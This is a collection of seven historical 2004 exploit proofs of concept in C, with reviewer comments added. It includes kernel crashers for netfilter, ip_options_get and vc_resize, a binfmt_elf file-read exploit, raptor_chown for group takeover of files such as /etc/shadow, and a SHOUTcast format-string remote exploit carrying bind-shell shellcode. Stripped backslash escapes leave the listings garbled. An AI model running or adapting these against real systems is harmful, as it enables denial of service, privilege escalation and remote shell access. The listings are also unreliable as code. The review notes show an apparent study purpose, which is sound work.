/*
 * iptables.log.integer.underflow.POC.c
 *
 * (CAN-2004-0816, BID11488, SUSE-SA:2004:037)
 *
 * felix__zhou _at_ hotmail _dot_ com
 *
 * Review notes (defender's view): historical 2004 proof-of-concept for the
 * netfilter LOG-target issue referenced above, fixed in the kernel at the
 * time.  It builds one raw IPv4/TCP SYN on Windows (IP_HDRINCL) whose TCP
 * data-offset field is below the 20-byte minimum and sends it in an unbounded
 * loop.  The lesson for packet parsers: bound every header-length field by
 * its minimum and by the bytes actually present before doing arithmetic on it.
 * NOTE(review): the listing is extraction-damaged -- backslash escapes were
 * stripped, so "%dn" etc. were presumably "%d\n"; left as found.
 */
#include <stdio.h>
#include <winsock2.h>
#include <ws2tcpip.h>
#include <time.h>

#pragma comment(lib,"ws2_32")

/* Destination: address as returned by inet_addr(), port, and their byte views. */
static unsigned char dip[4];
static unsigned int da;
static unsigned short dp;
static unsigned char dport[2];

/* Source address/port taken from the command line and written into the raw header. */
static unsigned char sip[4];
static unsigned int sa;
static unsigned short sp;
static unsigned char sport[2];

/* IP header checksum helper, disabled by the author; work() leaves the IP
 * checksum field (ip[10..11]) zero -- presumably filled in by the stack, confirm. */
/*
static void ip_csum(unsigned char *ip, unsigned int size, unsigned char *sum)
{
    unsigned int csum = 0;
    unsigned char *p = ip;
    while (1 < size) {
        csum += (p[0] << 8) + p[1];
        p += 2;
        size -= 2;
    }
    if (size)
        csum += *p;
    csum = (csum >> 16) + (csum & 0xffff);
    csum += (csum >> 16);
    sum[0] = (((unsigned short)(~csum)) >> 8);
    sum[1] = ((((unsigned short)(~csum)) << 8) >> 8);
}
*/

/*
 * Compute the TCP checksum of the `size`-byte segment at `tcp` and store it
 * big-endian in sum[0..1].  The pseudo-header is folded in from the IP header:
 * source/destination addresses (ip[12..19]), protocol 6 (TCP) and a TCP length
 * hard-coded to 0x14 (20 bytes) -- so the result is only right for a 20-byte
 * segment, which is all work() ever builds.  The checksum field (tcp[16..17])
 * must be zero while summing; work() zeroes it before each call.
 * NOTE(review): an odd trailing byte is added as the low byte; RFC 1071 pads
 * it as the high byte (p[0] << 8).  Irrelevant while size is always 20.
 */
static void tcp_csum(unsigned char *tcp, unsigned char *ip, unsigned int size, unsigned char *sum)
{
    unsigned int csum = 0;
    unsigned char *p = tcp;

    /* Sum the segment as big-endian 16-bit words. */
    while (1 < size) {
        csum += (p[0] << 8) + p[1];
        p += 2;
        size -= 2;
    }
    /* Pseudo-header: addresses from the IP header ... */
    csum += (ip[12] << 8) + ip[13];
    csum += (ip[14] << 8) + ip[15];
    csum += (ip[16] << 8) + ip[17];
    csum += (ip[18] << 8) + ip[19];
    csum += 0x06;                     /* ... protocol TCP ... */
    csum += 0x14;                     /* ... and a TCP length fixed at 20 bytes */
    if (size)
        csum += *p;                   /* odd trailing byte (see note above) */
    /* Fold the carries into 16 bits, twice, then store the complement big-endian. */
    csum = (csum >> 16) + (csum & 0xffff);
    csum += (csum >> 16);
    sum[0] = (((unsigned short)(~csum)) >> 8);            /* high byte */
    sum[1] = ((((unsigned short)(~csum)) << 8) >> 8);     /* low byte */
}

/*
 * Build the 40-byte IPv4+TCP SYN in buf and send it repeatedly over the raw
 * socket s until sendto() fails; the loop has no other exit.  Returns ret,
 * which is 1 on every path.  host.sin_port is assigned dp without htons();
 * with IP_HDRINCL the destination comes from the IP header, so this is
 * presumably harmless -- confirm.
 */
static int work(SOCKET s)
{
    DWORD ret = 1;
    unsigned char buf[1500];
    unsigned char *ip;
    unsigned char *tcp;
    unsigned int seq = 0x01;
    struct sockaddr_in host;

    ZeroMemory(buf, 1500);
    ip = buf;
    tcp = buf + 20;              /* TCP header follows the 20-byte IP header */
    ip[0] = 0x45;                /* ver & hlen */
    ip[3] = 0x28;                /* tlen: 40 = 20 IP + 20 TCP, no payload */
    ip[8] = 0x80;                /* ttl */
    ip[9] = 0x06;                /* protocol */
    ip[10] = ip[11] = 0;         /* IP checksum left zero (ip_csum is disabled above) */
    ip[12] = sip[0];             /* saddr */
    ip[13] = sip[1];
    ip[14] = sip[2];
    ip[15] = sip[3];
    ip[16] = dip[0];             /* daddr */
    ip[17] = dip[1];
    ip[18] = dip[2];
    ip[19] = dip[3];
    tcp[0] = sport[0];
    tcp[1] = sport[1];
    tcp[2] = dport[0];           /* dport */
    tcp[3] = dport[1];
    tcp[12] = 0x40;              /* hlen */ /* HERE */
    /* Data offset 4 => a 16-byte TCP header, below the 20-byte minimum and
     * shorter than the 20 bytes the packet actually carries.  This malformed
     * length field is the condition the LOG target mishandled. */
    tcp[13] = 0x02;              /* flags */

    ZeroMemory(&host, sizeof(struct sockaddr_in));
    host.sin_family = AF_INET;
    host.sin_port = dp;
    host.sin_addr.s_addr = da;

    for (;; ) {
        /* Fresh big-endian sequence number per packet. */
        tcp[4] = (seq >> 24);    /* seq number */
        tcp[5] = ((seq << 8) >> 24);
        tcp[6] = ((seq << 16) >> 24);
        tcp[7] = ((seq << 24) >> 24);
        tcp[16] = tcp[17] = 0;   /* checksum field must be zero while summing */
        seq ++;
        tcp_csum(tcp, ip, 0x14, tcp + 16);
        if (SOCKET_ERROR == sendto(s, buf, 0x28, 0, (SOCKADDR *)&(host), sizeof host)) {
            if (WSAEACCES != WSAGetLastError()) {
                printf("sendto() failed: %dn", WSAGetLastError());
                ret = 1;
            } else {
                /* raw sockets need elevated privileges on Windows */
                printf("You must be Administrator!n");
            }
            break;
        }
    }
    return ret;
}

/* Program constant used as a format string; never receives user input. */
static char usage[] = "Usage: %s dip dport sip sportn";

/*
 * Parse "dip dport sip sport", open a raw socket with IP_HDRINCL and hand it
 * to work().  Exit status is always 1: ret is never cleared, even after
 * work() has run.
 */
int main(int argc, char **argv)
{
    WORD ver = MAKEWORD(2, 2);
    WSADATA data;
    unsigned char *p;
    SOCKET s;
    int ret = 1;
    BOOL eopt = TRUE;            /* IP_HDRINCL: we supply the IP header ourselves */

    if (5 != argc) {
        printf(usage, argv[0]);
        goto out;
    }
    if (INADDR_NONE == (da = inet_addr(argv[1]))) {
        printf("dest ip address is NOT valid!n");
        printf(usage, argv[0]);
        goto out;
    }
    /* Split the network-order address into the bytes the raw header needs. */
    p = (unsigned char *)&da;
    dip[0] = p[0]; dip[1] = p[1]; dip[2] = p[2]; dip[3] = p[3];
    dp = atoi(argv[2]);              /* unchecked: non-numeric input silently becomes 0 */
    dport[0] = ((dp << 16) >> 24);   /* high byte of the 16-bit port */
    dport[1] = ((dp << 24) >> 24);   /* low byte */
    if (INADDR_NONE == (sa = inet_addr(argv[3]))) {
        printf("source ip address is NOT valid!n");
        printf(usage, argv[3]);      /* NOTE(review): presumably meant argv[0]; left unchanged */
        goto out;
    }
    p = (unsigned char *)&sa;
    sip[0] = p[0]; sip[1] = p[1]; sip[2] = p[2]; sip[3] = p[3];
    sp = atoi(argv[4]);              /* unchecked, as above */
    sport[0] = ((sp << 16) >> 24);
    sport[1] = ((sp << 24) >> 24);
    srand((unsigned int)time(0));    /* seeded, but rand() is never called */

    if (WSAStartup(ver, &data)) {
        printf("WSAStartup() failedn");
        goto out;
    }
    if (INVALID_SOCKET == (s = WSASocket(AF_INET, SOCK_RAW, IPPROTO_RAW, 0, 0, 0)))
        goto err;
    if (SOCKET_ERROR == setsockopt(s, IPPROTO_IP, IP_HDRINCL, (char *)&eopt, sizeof(eopt)))
        goto err1;
    work(s);
    /* goto-based cleanup: each label releases what was acquired before it */
err1:
    closesocket(s);
err:
    WSACleanup();
out:
    return ret;
}
/*
 * binfmt_elf executable file read vulnerability
 *
 * gcc -O3 -fomit-frame-pointer elfdump.c -o elfdump
 *
 * Copyright (c) 2004 iSEC Security Research. All Rights Reserved.
 *
 * THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS"
 * AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION
 * WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED.
 *
 * http://isec.pl/vulnerabilities/isec-0017-binfmt_elf.txt
 *
 * Review notes (defender's view): 2004 PoC for iSEC-0017 (URL above).  It
 * writes a minimal i386 ELF to a fixed path under /tmp whose PT_INTERP entry
 * names the file given on the command line and whose single PT_LOAD maps the
 * bytes of bad_code() at virtual address 0, then execs it with an unlimited
 * core limit so the child's deliberate crash leaves a core file.  Per the
 * advisory title the defect was the kernel ELF loader reading a file the
 * caller could not otherwise read -- confirm against the advisory; the
 * remedy was a kernel fix.  Review issues visible in this code: a
 * predictable /tmp path opened with O_CREAT but no O_EXCL (symlink/race
 * hazard), and every open()/write()/lseek()/execl() result is unchecked.
 * NOTE(review): backslash escapes were stripped by extraction ("n" for
 * "\n", tabs inside the asm strings); the listing is left as found and does
 * not assemble as shown.
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/resource.h>
#include <sys/wait.h>
#include <linux/elf.h>

/* Fixed, world-readable temp path: predictable and raceable (see header). */
#define BADNAME "/tmp/_elf_dump"

/* Print usage and exit 0 (exit status does not signal the error). */
void usage(char *s)
{
    printf("nUsage: %s executablenn", s);
    exit(0);
}

//ugly mem scan code :-)
/*
 * Hand-written i386 code that becomes the crafted ELF's entry point; only its
 * bytes are used (see the write() of 4096 bytes from &bad_code in main).
 * Reading the asm: it appears to install a signal handler via int 0x80
 * (eax=48 sys_signal, ebx=11 SIGSEGV), walk pages upward calling mprotect
 * (eax=125) and touching each page, stop at 0xc0000000, then jump through
 * 0xdeadbeef to force the crash that produces the core dump -- confirm
 * against the advisory.  NOTE(review): `volatile` on a void return type is
 * not valid standard C (compilers warn and ignore it).
 */
static volatile void bad_code(void)
{
    __asm__(
        //"1:jmp 1b n"
        "xorl%edi, %edin"
        "movl%esp, %esin"
        "xorl%edx, %edxn"
        "xorl%ebp, %ebpn"
        "callget_addrn"
        "movl%esi, %espn"
        "movl%edi, %ebpn"
        "jmpinst_sign"
        "get_addr:popl%ecxn"
        //sighand
        "inst_sig:xorl%eax, %eaxn"
        "movl$11, %ebxn"
        "movb$48, %aln"
        "int$0x80n"
        "ld_page:movl%ebp, %eaxn"
        "subl%edx, %eaxn"
        "cmpl$0x1000, %eaxn"
        "jleld_page2n"
        //mprotect
        "pushan"
        "movl%edx, %ebxn"
        "addl $0x1000, %ebxn"
        "movl%eax, %ecxn"
        "xorl%eax, %eaxn"
        "movb$125, %aln"
        "movl$7, %edxn"
        "int$0x80n"
        "popan"
        "ld_page2:addl$0x1000, %edin"
        "cmpl$0xc0000000, %edin"
        "jedumpn"
        "movl%ebp, %edxn"
        "movl(%edi), %eaxn"
        "jmpld_pagen"
        "dump:xorl%eax, %eaxn"
        "xorl%ecx, %ecxn"
        "movl$11, %ebxn"
        "movb$48, %aln"
        "int$0x80n"
        "movl$0xdeadbeef, %eaxn"
        "jmp*(%eax)n"
    );
}

/* End marker so the size of bad_code can be estimated by address difference. */
static volatile void bad_code_end(void)
{
}

/*
 * Write the crafted ELF, run it in a child with RLIMIT_CORE unlimited, wait,
 * then unlink the file.  av[1] is the path the PT_INTERP entry will name.
 */
int main(int ac, char **av)
{
    struct elfhdr eh;
    struct elf_phdr eph;
    struct rlimit rl;
    int fd, nl, pid;

    if(ac<2)
        usage(av[0]);

    //make bad a.out
    fd=open(BADNAME, O_RDWR|O_CREAT|O_TRUNC, 0755);   /* unchecked; no O_EXCL */
    nl = strlen(av[1])+1;                             /* interp string incl. NUL */
    memset(&eh, 0, sizeof(eh) );

    //elf exec header
    memcpy(eh.e_ident, ELFMAG, SELFMAG);
    eh.e_type = ET_EXEC;
    eh.e_machine = EM_386;
    eh.e_phentsize = sizeof(struct elf_phdr);
    eh.e_phnum = 2;
    eh.e_phoff = sizeof(eh);                          /* program headers follow the ELF header */
    write(fd, &eh, sizeof(eh) );

    //section header(s)
    /* PT_INTERP: points at the interp string written right after both phdrs. */
    memset(&eph, 0, sizeof(eph) );
    eph.p_type = PT_INTERP;
    eph.p_offset = sizeof(eh) + 2*sizeof(eph);
    eph.p_filesz = nl;
    write(fd, &eph, sizeof(eph) );

    /* PT_LOAD: one page of code at file offset 4096, mapped at vaddr 0, R+X. */
    memset(&eph, 0, sizeof(eph) );
    eph.p_type = PT_LOAD;
    eph.p_offset = 4096;
    eph.p_filesz = 4096;
    eph.p_vaddr = 0x0000;
    eph.p_flags = PF_R|PF_X;
    write(fd, &eph, sizeof(eph) );

    //.interp
    write(fd, av[1], nl );

    //execable code
    /* NOTE(review): nl is computed but unused -- a fixed 4096 bytes are
     * written.  Subtracting two function addresses is also not defined C. */
    nl = &bad_code_end - &bad_code;
    lseek(fd, 4096, SEEK_SET);
    write(fd, &bad_code, 4096);
    close(fd);

    //dump the shit
    /* Lift the core-size limit so the child's crash produces a core file. */
    rl.rlim_cur = RLIM_INFINITY;
    rl.rlim_max = RLIM_INFINITY;
    if( setrlimit(RLIMIT_CORE, &rl) )
        perror("nsetrlimit failed");
    fflush(stdout);                                   /* avoid duplicated buffered output after fork */
    pid = fork();
    if(pid)
        wait(NULL);
    else
        execl(BADNAME, BADNAME, NULL);                /* unchecked; on failure the child falls through */
    printf("ncore dumped!nn");
    unlink(BADNAME);
    return 0;
}
/*
 * int overflow in ip_options_get
 * Copyright Georgi Guninski
 * Cannot be used in vulnerability databases (like securityfocus and mitre)
 *
 * Review notes (defender's view): 2004 PoC for an integer overflow in the
 * kernel's ip_options_get path.  It sends one UDP datagram to 127.0.0.1:8080
 * with two IP_RETOPTS control messages, the second carrying cmsg_len = -1; a
 * kernel that uses cmsg_len as a length without checking it against
 * sizeof(struct cmsghdr) and msg_controllen overflows.  The rule it
 * illustrates: validate every caller-supplied length (lower bound, upper
 * bound, and any arithmetic on it) before use.  Fixed in the kernel at the
 * time; the intended outcome is a kernel crash, so it is only useful as a
 * regression test on a disposable machine.  Review issues in the user-space
 * code itself: socket()/connect()/malloc() results are unchecked, ac/av are
 * unused, and system("sync") spawns a shell for what sync(2) does directly.
 */
#include <unistd.h>
#include <stdlib.h>
#include <stdio.h>
#include <errno.h>
#include <ctype.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

int main(int ac,char **av)
{
    struct msghdr msghdr;
    struct iovec iovector[10];          /* only iovector[0] is used */
    int i,s;
    struct sockaddr_in sockad;
    char msg[128];
    struct cmsghdr *cmsg,*cm2;
    char opts[12];                      /* zeroed option bytes carried by the first cmsg */

    s=socket(PF_INET, /*SOCK_STREAM*/ SOCK_DGRAM, 0);          /* unchecked */
    sockad.sin_family = AF_INET;
    sockad.sin_addr.s_addr=inet_addr("127.0.0.1");
    sockad.sin_port=htons(8080);
    connect(s,(struct sockaddr *) &sockad, sizeof(sockad));    /* unchecked; for UDP only sets the default peer */
    memset(msg,'v',sizeof(msg));
    memset(opts,0,sizeof(opts));

#define VV 1024*1024
    cmsg = malloc(VV);                  /* 1 MiB control buffer; far more than the two headers need */
    memset(cmsg,0,VV);

    /* First control message: well-formed IP_RETOPTS with 12 option bytes. */
    cmsg->cmsg_len = sizeof(struct cmsghdr) + sizeof(opts);
    cmsg->cmsg_level = SOL_IP;
    cmsg->cmsg_type = IP_RETOPTS;
    memcpy(CMSG_DATA(cmsg), opts, sizeof(opts));

    /* Second control message, placed directly after the first one's data. */
    cm2= (struct cmsghdr *) (long) ((char *)CMSG_DATA(cmsg)+sizeof(opts));
    cm2->cmsg_level = SOL_IP;
    cm2->cmsg_type = IP_RETOPTS;
    cm2->cmsg_len = -1;                 /* the trigger: converts to the maximum of cmsg_len's
                                           unsigned type; a correct kernel must reject it */

    msghdr.msg_name = &sockad;
    msghdr.msg_namelen = sizeof(sockad);
    msghdr.msg_control=cmsg;
    msghdr.msg_controllen= cmsg->cmsg_len + 420;   /* covers both headers; 420 is presumably arbitrary slack */
    msghdr.msg_iov = iovector;
    msghdr.msg_iovlen = 1;
    /* NOTE(review): msg_flags is never initialized -- presumably ignored on
     * input by sendmsg(); confirm. */
    iovector[0].iov_base = msg;
    iovector[0].iov_len = sizeof(msg);

    system("sync");                     /* flush disks before a call expected to crash the kernel */
    if ((i = sendmsg(s, &msghdr, 0)) < 0)
        perror("sendmsg");
    return 42;
}
<doc_update>
/*
 * memory leak
 * Copyright Georgi Guninski
 * Cannot be used in vulnerability databases (like securityfocus and mitre)
 *
 * Review notes (defender's view): companion to the ip_options_get PoC,
 * targeting a kernel memory leak.  Each iteration sends one datagram carrying
 * a chain of ma (250) well-formed IP_RETOPTS control messages plus a short
 * final one, then frees its own buffer and closes its socket -- so any
 * growth in memory use while it runs is the kernel's, which is what the
 * printed instruction asks the operator to watch.  Intended only as a
 * regression test: the loop never terminates on success (while(42)) and must
 * be killed by hand.  Review issues in this code: socket()/connect()/malloc()
 * results are unchecked, ac/av are unused, and the function-scope #define VV
 * is a plain textual macro referring to the local `ma` -- it has file-wide
 * scope despite where it is written.
 */
#include <unistd.h>
#include <stdlib.h>
#include <stdio.h>
#include <errno.h>
#include <ctype.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

int main(int ac,char **av)
{
    struct msghdr msghdr;
    struct iovec iovector[10];          /* only iovector[0] is used */
    int i,s,j,ma;
    struct sockaddr_in sockad;
    char msg[128];
    struct cmsghdr *cmsg,*cm2;
    char opts[24];                      /* zeroed option bytes carried by each cmsg */

    ma=250;                             /* number of chained control messages after the first */
    printf("just wait and watch memory usage\n");
    memset(opts,0,sizeof(opts));

    while(42) {
        s=socket(PF_INET, /*SOCK_STREAM*/ SOCK_DGRAM, 0);          /* unchecked */
        sockad.sin_family = AF_INET;
        sockad.sin_addr.s_addr=inet_addr("127.0.0.1");
        sockad.sin_port=htons(8080);
        connect(s,(struct sockaddr *) &sockad, sizeof(sockad));    /* unchecked */
        memset(msg,'v',sizeof(msg));

/* ma chained messages plus 1 MiB of slack; expands over the local `ma`. */
#define VV (ma*(sizeof(struct cmsghdr)+sizeof(opts))+1024*1024)
        cmsg = malloc(VV);
        memset(cmsg,0,VV);

        /* First control message. */
        cmsg->cmsg_len = sizeof(struct cmsghdr) + sizeof(opts);
        cmsg->cmsg_level = SOL_IP;
        cmsg->cmsg_type = IP_RETOPTS;
        memcpy(CMSG_DATA(cmsg), opts, sizeof(opts));

        /* ma more identical messages, each placed right after the previous data. */
        cm2= (struct cmsghdr *) (long) ((char *)CMSG_DATA(cmsg)+sizeof(opts));
        for(j=0;j<ma;j++) {
            cm2->cmsg_level = SOL_IP;
            cm2->cmsg_type = IP_RETOPTS;
            cm2->cmsg_len = sizeof(struct cmsghdr) + sizeof(opts);
            cm2= (struct cmsghdr *) (long) ((char *)CMSG_DATA(cm2)+sizeof(opts));
        }

        /* Final, shorter message (8 data bytes). */
        cm2->cmsg_level = SOL_IP;
        cm2->cmsg_type = IP_RETOPTS;
        cm2->cmsg_len = sizeof(struct cmsghdr) + 8;

        msghdr.msg_name = &sockad;
        msghdr.msg_namelen = sizeof(sockad);
        msghdr.msg_control=cmsg;
        /* first + j (== ma) chained + final */
        msghdr.msg_controllen= cmsg->cmsg_len + (j)*cmsg->cmsg_len+cm2->cmsg_len;
        msghdr.msg_iov = iovector;
        msghdr.msg_iovlen = 1;
        iovector[0].iov_base = msg;
        iovector[0].iov_len = sizeof(msg);

        if ((i = sendmsg(s, &msghdr, 0)) < 0) {
            perror("sendmsg");
            return -42;
        }
        /* user-space resources are released each round; only kernel state can grow */
        close(s);
        free(cmsg);
    }
    return 42;
}
/*
 * vc_resize int overflow
 * Copyright Georgi Guninski
 * Cannot be used in vulnerability databases
 *
 * Review notes (defender's view): 2004 PoC for an integer overflow in the
 * console resize path reached through the VT_RESIZEX ioctl.  v_rows = 65535
 * and v_cols = 32769 are the author's "magic values": their product exceeds a
 * 32-bit int on i386.  A robust implementation computes the screen-buffer
 * size in a wide/unsigned type (or checks for overflow) and rejects the
 * request before allocating.  The expected result on a vulnerable kernel is
 * a crash, hence the system("sync") beforehand -- sync(2) does that without
 * spawning a shell.  Fixed in the kernel at the time; run only on a
 * disposable machine.  ac/av are unused.
 */
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <linux/vt.h>
#include <sys/vt.h>
#include <sys/ioctl.h>
#include <string.h>
#include <unistd.h>

int main(int ac, char **av)
{
    int fd;
    struct vt_consize vv;
    int cou=4242;                       /* number of ";)" lines printed if the ioctl returns */

    fd=open("/dev/tty",O_RDWR);         /* the controlling terminal must be a VT */
    if (fd<0) {
        perror("open");
        return -42;
    }
    memset(&vv,0,sizeof(vv));
    vv.v_clin=0;
    vv.v_vcol=0;
    vv.v_ccol=0;
    /* magic values, overflow on i386*/
    vv.v_rows=65535;
    vv.v_cols=32769;
    system("sync");                     /* flush disks before a call expected to crash the kernel */
    if (ioctl(fd,VT_RESIZEX,&vv) < 0) {
        perror("ioctl");                /* a fixed kernel rejects the size here */
        return -4242;
    }
    while(cou--)
        printf(";)\n");
    close(fd);
    return 42;
}
/*
 * $Id: raptor_chown.c,v 1.1 2004/12/04 14:44:38 raptor Exp $
 *
 * raptor_chown.c - sys_chown missing DAC controls on Linux
 * Copyright (c) 2004 Marco Ivaldi <raptor@0xdeadbeef.info>
 *
 * Unknown vulnerability in Linux kernel 2.x may allow local users to
 * modify the group ID of files, such as NFS exported files in kernel
 * 2.4 (CAN-2004-0497).
 *
 * "Basically, you can change the group of a file you don't own, but not
 * of an SGID executable." -- Solar Designer (0dd)
 *
 * On Linux 2.6.x < 2.6.7-rc3 it's possible to change the group of files you
 * don't own, even on local filesystems. This may allow a local attacker to
 * perform a privilege escalation, e.g. through the following attack vectors:
 *
 * 1) Target /etc/shadow: on some distros (namely slackware 9.1 and debian
 *    3.0, probably others) the shadow group has read access to it.
 * 2) Target /dev/mem, /dev/kmem: read arbitrary memory contents.
 * 3) Target /dev/hd*, /dev/sd*: read arbitrary data stored on disks.
 * 4) Target /dev/tty*, /dev/pts*: snoop/execute arbitrary commands.
 *
 * Usage:
 * $ gcc raptor_chown.c -o raptor_chown -Wall
 * $ ./raptor_chown /etc/shadow
 * [...]
 * -rw-r-----    1 root     users         500 Mar 25 12:27 /etc/shadow
 *
 * Vulnerable platforms:
 * Linux 2.2.x (on nfs exported files, should be vuln) [untested]
 * Linux 2.4.x < 2.4.27-rc3 (on nfs exported files) [tested]
 * Linux 2.6.x < 2.6.7-rc3 (default configuration) [tested]
 *
 * Review notes (defender's view): the whole test is the single chown() call
 * below -- owner left unchanged (-1), group set to the caller's own gid.  A
 * correct kernel refuses this with EPERM for a file the caller does not own,
 * which is what the "Not vulnerable" branch reports; the fix was in the
 * kernel (versions listed above).  Review issues in the program's own code:
 * sprintf() into cmd[256] with an unbounded argv[1] overflows on long paths,
 * and system() hands that string to a shell, so shell metacharacters in the
 * file name are interpreted -- an execv() of /bin/ls with argv[1] as a
 * separate argument avoids both.
 * NOTE(review): "n" in the format strings was presumably "\n" before
 * extraction stripped the backslashes; left as found.
 */
#include <errno.h>
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <sys/types.h>

#define INFO1 "raptor_chown.c - sys_chown missing DAC controls on Linux"
#define INFO2 "Copyright (c) 2004 Marco Ivaldi <raptor@0xdeadbeef.info>"

int main(int argc, char **argv)
{
    char cmd[256];

    /* print exploit information */
    fprintf(stderr, "%sn%snn", INFO1, INFO2);

    /* read command line */
    if (argc != 2) {
        fprintf(stderr, "usage: %s file_namenn", argv[0]);
        exit(1);
    }

    /* ninpou: sys_chown no jutsu! */
    /* owner -1 == unchanged; only the group is requested to change */
    if (chown(argv[1], -1, getgid()) < 0) {
        switch(errno) {
        case EPERM:
            /* the DAC check held: expected on a fixed kernel */
            fprintf(stderr, "Error: Not vulnerable!n");
            break;
        default:
            perror("Error");
        }
        exit(1);
    }
    fprintf(stderr, "Ninpou: sys_chown no jutsu!n");

    /* print some output */
    /* NOTE(review): unbounded sprintf + system() on a user-supplied name (see header) */
    sprintf(cmd, "/bin/ls -l %s", argv[1]);
    system(cmd);

    exit(0);
}
/* SHOUTcast DNAS/Linux v1.9.4 format string remote exploit */
/* Damian Put <pucik cc-team org> Cyber-Crime Team (www.CC-Team.org) */
/* Tested on slackware 9.1 and 10.0 (0xbf3feee0) */
/* When exploit only crash SHOUTcast we should calculate new address: */
/* */
/* bash-2.05b$ gdb sc_serv core */
/* ... */
/* (gdb) x/x $edi */
/* 0xbe462270: 0x78257825 */
/* (gdb) x/x 0xbe462270-996 */
/* 0xbe461e8c: 0x5050c031 */
/* */
/* 0xbe461e8c - This is our shellcode addr */
/* */
/* Now we "only" must change format string code in req2 :-) */

/*
 * Review notes (defender's view): 2004 exploit for a format-string bug in
 * SHOUTcast 1.9.4's request handling, kept as a historical example.  The
 * root cause is the server passing attacker-controlled request text to a
 * printf-family function as the format argument; the server-side fix is to
 * use a constant format (printf("%s", s)), compile with -Wformat-security,
 * and rely on libc hardening (_FORTIFY_SOURCE) that refuses %n in writable
 * format strings.  The payload and request strings below are
 * extraction-damaged (backslash escapes stripped, spaces inserted by word
 * wrap) and are left as found; they do not work as shown.  Review issues in
 * the code itself: <string.h> and <unistd.h> are not included although
 * strcat/strlen/strerror/write are used; socket() and write() results are
 * unchecked; dest.sin_family should be AF_INET (same value as PF_INET on
 * Linux, so harmless).
 */
#include <stdio.h>
#include <stdlib.h>
#include <sys/errno.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>

/* Default SHOUTcast port */
#define PORT 8000

/* Payload appended to the first request (escapes stripped by extraction). */
char shellcode[] = //bindshellcode (port 7000)
"x31xc0x50x50x66xc7x44x24x02x1bx58xc6x04x24x02x89xe6"
"xb0x02xcdx80x85xc0x74x08x31xc0x31xdbxb0x01xcdx80x50"
"x6ax01x6ax02x89xe1x31xdbxb0x66xb3x01xcdx80x89xc5x6a"
"x10x56x50x89xe1xb0x66xb3x02xcdx80x6ax01x55x89xe1x31"
"xc0x31xdbxb0x66xb3x04xcdx80x31xc0x50x50x55x89xe1xb0"
"x66xb3x05xcdx80x89xc5x31xc0x89xebx31xc9xb0x3fxcdx80"
"x41x80xf9x03x7cxf6x31xc0x50x68x2fx2fx73x68x68x2fx62"
"x69x6ex89xe3x50x53x89xe1x99xb0x0bxcdx80";

/*
 * Resolve argv[1], open two successive TCP connections to PORT and send req1
 * then req2.  Exit status: 0 after both sends, -1 on resolve/connect failure,
 * 0 on usage error as well.
 */
int main(int argc, char *argv[])
{
    int sock;
    char *host;
    struct hostent *h;
    struct sockaddr_in dest;

    /* First request: fixed prefix, then shellcode and suffix appended with
     * strcat; 1024 bytes is ample for the lengths used here. */
    char req1[1024] = "GET /content/AA" /* sprintf GOT addr */
        "x3cx49x06x08x3dx49x06x08x3ex49x06x08x3fx49x06x08";
    strcat(req1, shellcode);
    strcat(req1, ".mp3 HTTP/1.0rnrn");

    /* We cannot use %numberx and %number$n (filtered) */
    /* 0xbf3feee0 - shellcode addr on slackware 9.1 */
    /* Second request: the format-string payload itself (left as found). */
    char *req2 = "GET /content/%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x %x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x"
        "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
        "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA-%n-AAAAAAAAAAAA- %n-AAAAAAAAAAAAAAAAAAAAAAAAAAAA"
        "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA-%n-AAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
        "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAA- %n.mp3"
        " HTTP/1.0rnrn";

    printf("SHOUTcast DNAS/Linux v1.9.4 format string remote exploit by pucik www.CC-Team.orgn");

    if(argc < 2) {
        printf("Usage: %s <host>n", argv[0]);
        exit(0);
    }

    host = argv[1];
    if(!(h = gethostbyname(host))) {
        fprintf(stderr, "Cannot get IP of %s, %s!n", host, strerror(errno));
        exit(-1);
    }

    sock = socket(PF_INET, SOCK_STREAM, 0);           /* unchecked */
    dest.sin_addr=*((struct in_addr*)h->h_addr);
    dest.sin_family = PF_INET;                         /* should be AF_INET; same value on Linux */
    dest.sin_port = htons(PORT);

    if(connect(sock, (struct sockaddr*)&dest, sizeof(struct sockaddr)) == -1) {
        fprintf(stderr, "Cannot connect to %s, %s!n", host, strerror(errno));
        exit(-1);
    }
    printf(" Sending first request ...n");
    write(sock, req1, strlen(req1));                   /* unchecked; no loop for short writes */
    close(sock);

    /* New connection for the second request. */
    sock = socket(PF_INET, SOCK_STREAM, 0);            /* unchecked */
    if(connect(sock, (struct sockaddr*)&dest, sizeof(struct sockaddr)) == -1) {
        fprintf(stderr, "Cannot connect to %s, %s!n", host, strerror(errno));
        exit(-1);
    }
    printf(" Sending second request ...n");
    write(sock, req2, strlen(req2));                   /* unchecked */
    close(sock);

    printf(" Try telnet %s 7000 :)n", host);
    return 0;
}